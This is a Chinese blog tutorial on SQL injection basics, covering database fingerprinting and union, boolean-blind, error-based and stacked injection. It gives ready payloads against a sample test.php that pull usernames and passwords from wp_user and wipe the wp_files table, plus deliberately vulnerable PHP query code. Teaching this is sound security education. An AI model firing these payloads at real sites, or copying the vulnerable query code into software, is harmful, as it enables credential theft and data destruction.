

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme="auto">



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://img.mkerosene.cn/touxiang.jpg">
  <link rel="icon" href="https://img.mkerosene.cn/touxiang.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <!-- NOTE(review): the only CSP directive here is upgrade-insecure-requests, which rewrites
         http: sub-resource URLs to https:. There is no script-src / style-src, so this policy
         neither restricts where script may be loaded from nor blocks injected inline script.
         Adding one would require nonces or hashes for the inline <script> elements this page
         carries (theme config below, comments loader, progress bar, typing effect). -->
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Kerosene W">
  <meta name="keywords" content="">
  
    <meta name="description" content="sqli判断数据库类型 一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型  默认端口判断 Oracle：1521   SQL Server：1433   MySQL ：3306   数据库特有的数据表判断 oracle数据库  1test.php?id&#x3D;1 and (select count(*) from sys.user_tables)&gt;0 and 1&#x3D;1">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli基础">
<meta property="og:url" content="http://example.com/2021/08/23/sqli%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="追求源于热爱">
<meta property="og:description" content="sqli判断数据库类型 一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型  默认端口判断 Oracle：1521   SQL Server：1433   MySQL ：3306   数据库特有的数据表判断 oracle数据库  1test.php?id&#x3D;1 and (select count(*) from sys.user_tables)&gt;0 and 1&#x3D;1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.mkerosene.cn/sql.png">
<meta property="article:published_time" content="2021-08-23T14:13:17.000Z">
<meta property="article:modified_time" content="2021-10-14T15:52:34.088Z">
<meta property="article:author" content="Kerosene W">
<meta property="article:tag" content="sqli">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.mkerosene.cn/sql.png">
  
  
  <title>sqli基础 - 追求源于热爱</title>

  <!-- NOTE(review): the jsDelivr stylesheets here (and the scripts at the end of <body>) are
       pinned to a major version only (@4, @10, @3), so the file served is whatever the newest
       matching release is, and none of them carry an integrity attribute. Subresource Integrity
       needs an exact version pin, because the hash changes per release; until then the CDN
       is fully trusted for both style and script. -->
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Icon fonts required by the theme; not meant to be edited by hand.
     NOTE(review): protocol-relative URLs. The upgrade-insecure-requests policy above turns
     them into https: on supporting browsers, but an explicit https: scheme would not depend
     on that. -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->
<!-- Custom styles stay at the very bottom of the stylesheet list. -->


  <!-- Theme runtime configuration (presumably read by the /js/*.js files loaded below).
       NOTE(review): "hostname" and the og:url above say example.com while assets are served
       from img.mkerosene.cn; looks like the generator's site URL was left at its default,
       confirm.
       NOTE(review): the LeanCloud app_id / app_key under web_analytics are shipped to every
       visitor. Confirm these are the client-side (public) keys and that write access to the
       counter class is restricted on the LeanCloud side, since the key alone presumably
       suffices to call the REST API. -->
  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.13","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"❡"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"https://img.mkerosene.cn/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"FI1uAFAYz0Q3MPDiORqd0JAN-gzGzoHsz","app_key":"EhKAjMe3bmq0WLTSgktGg2OC","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
</head>


<body>
  <header style="height: 70vh;">

    <div class="banner" id="banner" parallax=true
         style="background: url('https://img.mkerosene.cn/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli基础">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-23 22:13" pubdate>
        2021年8月23日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.4k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      11 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli基础</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：1 年前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="sqli"><a href="#sqli" class="headerlink" title="sqli"></a>sqli</h1><h2 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h2><ul>
<li><p>一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型</p>
</li>
<li><h5 id="默认端口判断"><a href="#默认端口判断" class="headerlink" title="默认端口判断"></a>默认端口判断</h5><blockquote>
<p>Oracle：1521</p>
</blockquote>
<blockquote>
<p>SQL Server：1433</p>
</blockquote>
<blockquote>
<p>MySQL ：3306</p>
</blockquote>
</li>
<li><h5 id="数据库特有的数据表判断"><a href="#数据库特有的数据表判断" class="headerlink" title="数据库特有的数据表判断"></a>数据库特有的数据表判断</h5><ul>
<li><h6 id="oracle数据库"><a href="#oracle数据库" class="headerlink" title="oracle数据库"></a>oracle数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from sys.user_tables)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="mysql数据库-mysql版本在5-0以上"><a href="#mysql数据库-mysql版本在5-0以上" class="headerlink" title="mysql数据库(mysql版本在5.0以上)"></a>mysql数据库(mysql版本在5.0以上)</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from information_schema.TABLES)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="access数据库"><a href="#access数据库" class="headerlink" title="access数据库"></a>access数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from msysobjects)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="mssql数据库"><a href="#mssql数据库" class="headerlink" title="mssql数据库"></a>mssql数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from sysobjects)&gt;0 and 1=1<br></code></pre></td></tr></table></figure></li>
</ul>
<hr>
<h3 id="注入基础"><a href="#注入基础" class="headerlink" title="注入基础"></a>注入基础</h3><blockquote>
<h4 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h4></blockquote>
<ul>
<li>GET 型：整型与字符型注入判断；<code>--+</code>（<code>-- -</code>）表示注释其后内容</li>
<li>判断列数：order by n(n+1)</li>
<li>判断显示位：select 1,2,3,4…n(n+1)</li>
</ul>
<blockquote>
<p>Point</p>
</blockquote>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs elixir">group_concat() 把相同的值全部以逗号分割的形式列出来<br><span class="hljs-number">1</span><span class="hljs-symbol">:system_user</span>()  系统用户名<br><span class="hljs-number">2</span><span class="hljs-symbol">:user</span>()         用户名<br><span class="hljs-number">3</span><span class="hljs-symbol">:current_user</span>   当前用户名<br><span class="hljs-number">4</span><span class="hljs-symbol">:session_user</span>()  连接数据库的用户名<br><span class="hljs-number">5</span><span class="hljs-symbol">:database</span>()     数据库名<br><span class="hljs-number">6</span><span class="hljs-symbol">:version</span>()       MYSQL数据库版本<br><span class="hljs-number">7</span><span class="hljs-symbol">:load_file</span>()      转成<span class="hljs-number">16</span>进制或者是<span class="hljs-number">10</span>进制 MYSQL读取本地文件的函数<br><span class="hljs-number">8</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@datadir</span>     读取数据库路径<br><span class="hljs-number">9</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@basedir</span>     MYSQL安装路径<br><span class="hljs-number">10</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@version_compile_os</span>     操作系统<br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="数字型注入和UNION注入"><a href="#数字型注入和UNION注入" class="headerlink" title="数字型注入和UNION注入"></a>数字型注入和UNION注入</h4></blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2 #注入点<br></code></pre></td></tr></table></figure>

<ul>
<li>数字运算判断</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">//源码<br>...<br><span class="hljs-meta">$</span><span class="bash">conn = mysqli_connect(<span class="hljs-string">&quot;127.0.0.1&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;test&quot;</span>)</span><br><span class="hljs-meta">$</span><span class="bash">res = mysqli_query(<span class="hljs-variable">$conn</span>, <span class="hljs-string">&quot;SELECT title, content FROM wp_news WHERE id=&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>])</span><br>...<br>//判断<br>test.php?id=3-1 #回显一致即可确定为数字注入，源码表现为输入点“$_GET[&#x27;id&#x27;]”附近无引号包裹<br></code></pre></td></tr></table></figure>

<ul>
<li>联合查询</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs SQL">#表名查询<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(table_name) <span class="hljs-keyword">FROM</span> information_schema.tables <span class="hljs-keyword">WHERE</span> table_schema<span class="hljs-operator">=</span>database()<br>#列查询<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(column_name) <span class="hljs-keyword">FROM</span> information_schema.columns <span class="hljs-keyword">WHERE</span> table_name<span class="hljs-operator">=</span><span class="hljs-string">&#x27;wp_user&#x27;</span><br>#实例<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user<br>#显示控制(页面显示受限时)<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user limit <span class="hljs-number">1</span>,<span class="hljs-number">1</span>(显示查询效果的第二条)<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span 
class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user<br><br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="字符型注入和布尔盲注"><a href="#字符型注入和布尔盲注" class="headerlink" title="字符型注入和布尔盲注"></a>字符型注入和布尔盲注</h4></blockquote>
<ul>
<li>类型判断</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">//源码<br>...<br><span class="hljs-meta">$</span><span class="bash">res = mysqli_query(<span class="hljs-variable">$conn</span>,<span class="hljs-string">&quot;SELECT title,content FROM wp_news WHERE id=&#x27;&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>].<span class="hljs-string">&quot;&#x27;&quot;</span>)</span><br>...<br>//判断<br>test.php?id=2a	#确定不是数字型后，加字母回显一致表明输入点被‘’包围，强制转换为字符串，确定为字符型<br></code></pre></td></tr></table></figure>

<ul>
<li>闭合+注释</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2&#x27;%23<br>test.php?id=2&#x27;--+<br>test.php?id=2&#x27;--%20<br></code></pre></td></tr></table></figure>

<ul>
<li>闭合+闭合</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2&#x27; and &#x27;1<br></code></pre></td></tr></table></figure>

<ul>
<li>布尔盲注</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span><span class="hljs-string">&#x27; and &#x27;</span>a<span class="hljs-string">&#x27;=&#x27;</span>a<span class="hljs-string">&#x27;	#原理</span><br><span class="hljs-string">test.php?id=2&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;f&#x27;</span><span class="hljs-operator">&lt;</span><span class="hljs-string">&#x27;n&#x27;</span>	#二分法猜测字符<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>第<span class="hljs-number">1</span>位字符<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span><span class="hljs-string">&#x27; and(select mid((select concat(user,0x7e,pwd)from wp_user),1,1))=&#x27;</span>a<span class="hljs-string">&#x27;%23</span><br><span class="hljs-string">//第2位字符</span><br><span class="hljs-string">test.php?id=2&#x27;</span> <span class="hljs-keyword">and</span>(<span class="hljs-keyword">select</span> mid((<span class="hljs-keyword">select</span> concat(<span class="hljs-keyword">user</span>,<span class="hljs-number">0x7e</span>,pwd)<span class="hljs-keyword">from</span> wp_user),<span class="hljs-number">2</span>,<span class="hljs-number">1</span>))<span class="hljs-operator">=</span><span class="hljs-string">&#x27;d&#x27;</span><span class="hljs-operator">%</span><span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<ul>
<li>时间盲注</li>
</ul>
<hr>
<blockquote>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4></blockquote>
<ul>
<li><p>原理</p>
<p>触发SQL语句错误并把错误信息输出</p>
</li>
<li><p><code>updatexml</code>报错</p>
</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; or updatexml(1,concat(0x7e,(select pwd from wp_user)),1)%23</span><br><span class="hljs-string">//源码</span><br><span class="hljs-string">...</span><br><span class="hljs-string">$res = mysqli_query($conn, &quot;SELECT title, content FROM wp_news WHERE id=&#x27;</span>&quot;.$_GET[&#x27;id&#x27;].&quot;<span class="hljs-string">&#x27;&quot;) OR VAR_DUMP(mysqli_error($conn));</span><br><span class="hljs-string">...</span><br></code></pre></td></tr></table></figure>

<ul>
<li>堆叠注入(修改数据库)</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//多语句执行源码</span><br><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-variable">$db</span> = <span class="hljs-keyword">new</span> PDO(<span class="hljs-string">&quot;mysql:host=localhost:3306;dbname=test&quot;</span>,<span class="hljs-string">&quot;root&quot;</span>,<span class="hljs-string">&#x27;root&#x27;</span>);<br>	<span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;SELECT title, content FROM wp_news WHERE id=&#x27;&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>].<span class="hljs-string">&quot;&#x27;&quot;</span>;<br>...<br><span class="hljs-comment">//删除表wp_files中所有数据</span><br>test.php?id=<span class="hljs-number">1</span>%<span class="hljs-number">27</span>;delete%<span class="hljs-number">20</span>%<span class="hljs-number">20</span><span class="hljs-keyword">from</span>%<span class="hljs-number">20</span>wp_files;%<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<hr>
<blockquote>
<h4 id="注入优先级"><a href="#注入优先级" class="headerlink" title="注入优先级"></a>注入优先级</h4></blockquote>
<p>UNION注入 &gt; 报错注入 &gt; 布尔盲注 &gt; 时间盲注</p>
<hr>
<h3 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h3><blockquote>
<h4 id="SELECT注入"><a href="#SELECT注入" class="headerlink" title="SELECT注入"></a>SELECT注入</h4></blockquote>
<ol>
<li>注入点在select_expr</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span>(<span class="hljs-keyword">select</span> pwd <span class="hljs-keyword">from</span> wp_user) <span class="hljs-keyword">as</span> title	#<span class="hljs-keyword">AS</span>别名法<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select $&#123;_GET[&#x27;id&#x27;]&#125;, content from wp_news&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="2">
<li>注入点在table_reference</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs SQL">test.php?<span class="hljs-keyword">table</span><span class="hljs-operator">=</span>(<span class="hljs-keyword">select</span> pwd <span class="hljs-keyword">as</span> title <span class="hljs-keyword">from</span> wp_user)<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from $&#123;_GET[&#x27;table&#x27;]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="3">
<li>注入点在WHERE或HAVING后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from wp_news where id = $&#123;_GET[id]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="4">
<li>注入点在GROUP by或order by后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>时间注入<br>test.php?title<span class="hljs-operator">=</span>id <span class="hljs-keyword">desc</span>,(<span class="hljs-number">1</span>,if(sleep(<span class="hljs-number">1</span>),<span class="hljs-number">1</span>))<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from wp_news group by $&#123;_GET[&#x27;title&#x27;]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="5">
<li>注入点在LIMIT后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="INSERT注入"><a href="#INSERT注入" class="headerlink" title="INSERT注入"></a>INSERT注入</h4></blockquote>
<hr>
<blockquote>
<h4 id="UPDATE注入"><a href="#UPDATE注入" class="headerlink" title="UPDATE注入"></a>UPDATE注入</h4></blockquote>
<hr>
<blockquote>
<h4 id="DELETE注入"><a href="#DELETE注入" class="headerlink" title="DELETE注入"></a>DELETE注入</h4></blockquote>
<h4 id=""><a href="#" class="headerlink" title=""></a></h4>
            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Cyber-Security/">Cyber-Security</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sqli/">sqli</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/08/%E7%A7%91%E6%9D%A5%E6%9D%AF%E5%9F%B9%E8%AE%AD/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">科来杯培训</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/12/ISCC2021-wp/">
                        <span class="hidden-mobile">ISCC2021-wp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="twikoo"></div>
  <script type="text/javascript">
    // Comments widget: Fluid.utils.loadComments (theme helper, defined elsewhere) decides when
    // the callback runs; the callback then fetches the Twikoo bundle and initialises it.
    Fluid.utils.loadComments('#comments', function () {
      var twikooSrc = 'https://cdn.jsdelivr.net/npm/twikoo@1/dist/twikoo.all.min.js';
      // NOTE(review): "@1" is a floating major-version tag fetched without an integrity hash,
      // so the script served can change without any change to this page; an exact version pin
      // would at least make the dependency reproducible.
      Fluid.utils.createScript(twikooSrc, function () {
        var themeConfig = {"envId":"blog-3gentarg3e6a1b5e","region":"ap-shanghai","path":"window.location.pathname"};
        var pageConfig = {
          el: '#twikoo',
          // NOTE(review): this is the literal string 'window.location.pathname', not the
          // evaluated pathname; verify whether Twikoo treats it as an expression, otherwise
          // every page may end up sharing a single comment thread.
          path: 'window.location.pathname',
          onCommentLoaded: function () {
            Fluid.plugins.initFancyBox('#twikoo .tk-content img:not(.tk-owo-emotion)');
          }
        };
        // Object.assign merges in place; pageConfig keys win over themeConfig keys.
        twikoo.init(Object.assign(themeConfig, pageConfig));
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
    

    
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div class="copyright">&copy;2020 - 2021 By Kerosene.W</div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    // Top-of-page progress bar: configured and started as soon as this script runs,
    // completed once the window 'load' event fires. Wrapped in an IIFE so nothing leaks
    // into the global scope.
    (function () {
      NProgress.configure({"showSpinner":false,"trickleSpeed":100});
      NProgress.start();
      window.addEventListener('load', function onWindowLoad() {
        NProgress.done();
      });
    })();
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    // Typewriter effect for the banner subtitle. The text to type comes from the title
    // attribute of #subtitle (the span's own content is rendered empty in the banner above).
    (function (win, doc) {
      // Detach the helper before calling it, same as the theme does elsewhere, so `this`
      // inside typing() is not bound to Fluid.plugins.
      var typeOut = Fluid.plugins.typing;
      var subtitleEl = doc.getElementById('subtitle');
      var subtitleText = subtitleEl.title;
      typeOut(subtitleText);
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
